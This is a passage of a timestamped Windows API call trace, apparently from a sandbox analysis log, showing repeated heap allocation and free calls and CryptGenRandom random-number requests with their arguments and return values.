returned 0x2e9c70 [0033.121] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9d00 [0033.121] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9d90 [0033.121] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9e20 [0033.121] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9eb0 [0033.124] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9520 | out: hHeap=0x2b0000) returned 1 [0033.124] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9490 | out: hHeap=0x2b0000) returned 1 [0033.124] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9400 | out: hHeap=0x2b0000) returned 1 [0033.124] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9370 | out: hHeap=0x2b0000) returned 1 [0033.124] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e92e0 | out: hHeap=0x2b0000) returned 1 [0033.124] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9250 | out: hHeap=0x2b0000) returned 1 [0033.124] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e91c0 | out: hHeap=0x2b0000) returned 1 [0033.124] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9130 | out: hHeap=0x2b0000) returned 1 [0033.124] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e90a0 | out: hHeap=0x2b0000) returned 1 [0033.124] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9010 | out: hHeap=0x2b0000) returned 1 [0033.124] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8f80 | out: hHeap=0x2b0000) returned 1 [0033.124] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8ef0 | out: hHeap=0x2b0000) returned 1 [0033.124] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8e60 | out: hHeap=0x2b0000) returned 1 [0033.124] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8dd0 | out: hHeap=0x2b0000) returned 1 [0033.124] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8d40 | out: hHeap=0x2b0000) returned 1 [0033.124] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8cb0 | out: hHeap=0x2b0000) returned 1 [0033.124] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8c20 | out: hHeap=0x2b0000) returned 1 [0033.124] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e96d0 | out: hHeap=0x2b0000) returned 1 [0033.124] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9760 | out: hHeap=0x2b0000) returned 1 [0033.124] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e97f0 | out: hHeap=0x2b0000) returned 1 [0033.124] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9880 | out: hHeap=0x2b0000) returned 1 [0033.124] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9910 | out: hHeap=0x2b0000) returned 1 [0033.124] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e99a0 | out: hHeap=0x2b0000) returned 1 [0033.124] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9a30 | out: hHeap=0x2b0000) returned 1 [0033.124] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9ac0 | out: hHeap=0x2b0000) returned 1 [0033.124] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9b50 | out: hHeap=0x2b0000) returned 1 [0033.124] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9be0 | out: hHeap=0x2b0000) returned 1 [0033.124] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9c70 | out: hHeap=0x2b0000) returned 1 [0033.124] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9d00 | out: hHeap=0x2b0000) returned 1 [0033.125] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9d90 | out: hHeap=0x2b0000) returned 1 [0033.125] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9e20 | out: hHeap=0x2b0000) returned 1 [0033.125] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9eb0 | out: hHeap=0x2b0000) returned 1 [0033.125] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e95b0 | out: hHeap=0x2b0000) returned 1 [0033.125] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eb078 | out: hHeap=0x2b0000) returned 1 [0033.125] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2e6bf8 [0033.125] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2ecd18 [0033.125] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2ece20 [0033.125] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x108) returned 0x2eb078 [0033.125] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.125] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xc) returned 0x2bef88 [0033.125] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eb190 [0033.125] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ecd18 | out: hHeap=0x2b0000) returned 1 [0033.125] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e95b0 [0033.125] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ece20 | out: hHeap=0x2b0000) returned 1 [0033.125] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eae48 [0033.125] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e95b0 | out: hHeap=0x2b0000) returned 1 [0033.125] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.125] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xc) returned 0x2befa0 [0033.125] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.125] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.125] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.125] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.125] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x88) returned 0x2e95b0 [0033.125] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2befa0 | out: hHeap=0x2b0000) returned 1 [0033.125] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2ead30 [0033.125] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e95b0 | out: hHeap=0x2b0000) returned 1 [0033.125] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.125] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.125] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.125] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.125] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.125] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.125] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.125] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.125] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.125] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.126] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.126] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.126] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.126] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.126] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.126] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.126] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.126] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.126] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.126] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.126] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.126] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.126] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.126] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.126] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.126] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.126] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.126] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.126] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.126] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.126] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.126] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.126] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.126] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.126] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.126] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.126] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.126] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.126] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.126] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.126] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.126] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.126] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.126] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.126] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.126] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.126] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.127] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.127] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.127] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.127] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.127] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.127] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.127] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.127] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.127] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.127] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.127] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.127] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.127] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.128] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.128] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.128] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.129] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.129] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.129] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2eac08 [0033.129] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2eac90 [0033.129] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2e6bf8 [0033.129] CryptAcquireContextW (in: phProv=0x2ad724, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad724*=0x2e6c80) returned 1 [0033.130] CryptGenRandom (in: hProv=0x2e6c80, dwLen=0x80, pbBuffer=0x2ad738 | out: pbBuffer=0x2ad738) returned 1 [0033.130] CryptReleaseContext (hProv=0x2e6c80, dwFlags=0x0) returned 1 [0033.130] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9640 [0033.133] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.134] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.134] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.134] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.135] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.135] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.135] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.135] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.135] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.136] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.136] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.136] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.136] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.137] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.137] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.137] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.138] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.138] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.185] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.185] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.185] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.185] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.186] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.186] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.186] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.187] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.187] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.187] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.188] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.188] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.188] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.189] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.189] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.189] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.190] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.190] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.190] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.190] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.190] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.190] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.192] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.192] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.192] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.192] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.193] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.193] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.193] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.193] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.193] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.194] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.194] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.194] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.195] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.195] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.195] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.196] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.196] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.196] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.196] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.197] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.197] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.197] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.197] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.197] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.198] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.198] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.244] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.245] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.245] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.245] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.245] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.245] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.245] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.246] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.246] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.246] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.247] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.247] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.247] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.248] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.248] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.248] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.249] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.249] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.249] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.249] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.249] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.250] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2eac08 [0033.250] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2eac90 [0033.250] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2e6bf8 [0033.250] CryptAcquireContextW (in: 